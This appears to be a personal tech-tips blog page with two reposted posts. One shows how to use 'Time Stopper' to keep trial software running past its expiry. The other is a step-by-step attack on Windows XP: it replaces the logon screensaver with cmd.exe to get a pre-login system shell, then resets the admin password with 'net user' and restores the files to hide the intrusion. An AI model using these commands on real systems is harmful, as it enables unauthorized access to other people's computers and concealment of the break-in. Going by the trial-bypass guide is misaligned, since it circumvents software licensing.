Windows tips, Registry Hacks, Network security and Linux tips
RSS icon Email icon Home icon
  • Remove Time Limit From Trial Software With Time Stopper

    Posted on June 16th, 2009 admin 1 comment

    Article From: http://www.addictivetips.com/windows-tips/remove-time-limit-from-trial-software-with-time-stopper/

    So you downloaded a trial software and loved it, now what? The next step would be to use this software forever, but how would you do so? Time Stopper is a free tool for Windows that can stop any trial software’s time for you. For example you downloaded a software that comes with 15-days trial, you used for 3 days which means 12 more days are left before it expires. Just run Time Stopper, choose the program, set the date between the trial limit, and it would handle the rest by stopping the time for you.

    Below is the complete guide on how to stop a time of a trial software. Make sure that you have read it thoroughly till the end before using this tool.

    Note: When this tool will stop the time for a trial software, it will not change or stop your system time.

    First click Browse and select the executable(.exe) file of the software whose trial limit you want to remove. Then go ahead and choose the date, this date should be within the trial period of the software. Let me elaborate, for example you installed a trial software on 1st June, used it till 3rd June and is going to expire on 15th June. Now you will select the date between 4th June and 14th June.

    time stopper - select date screenshot

    On the right side of the screen you will be shown a system calendar so that you can know what date is today. In the next step, choose the time and finally click, Open software on your date button. This will open the software on the date that you have defined.

    open trial software on date

    If you have to open any trial software frequently using Time Stopper, you can create it’s desktop shortcut. To do so, first enter the desktop icon name and then click Create Desktop Shortcut button. Now use this newly created desktop icon to open the trial software you frequently use. ;)

    creating shortcut for trial software

    Important Note: The trial limit of the trial software will come to a halt if you use Time Stopper to open that software. And once you use Time Stopper to run any trial software, make sure that you remove all desktop icons of that software. In this way you won’t accidentally click the original program icon otherwise the trial period will be permanently over. I would recommend that you read the help file too that comes with Time Stopper.

    It is not a new tool, but can work with most trial software currently available and is compatible with all versions of Windows. You can also learn to reinstall trial software after trial period has expired. Enjoy!

    If you liked this post, please buy me a coffee! Donations will be VERY much appreciated!

  • How to Hack a Window XP Admins Password

    Posted on August 4th, 2008 admin No comments

    Ever Wondered That you can hack the admins password?
    Its very possible, Anyone can do it!
    I have found this post on http://internetbusinessdaily.net/how-to-hack-a-window-xp-admins-password/
    Hope you find this useful, As I did

    This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
    cd\
    cd\windows\system32
    mkdir temphack
    copy logon.scr temphack\logon.scr
    copy cmd.exe temphack\cmd.exe
    del logon.scr
    rename cmd.exe logon.scr
    exit

    So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

    If you liked this post, please buy me a coffee! Donations will be VERY much appreciated!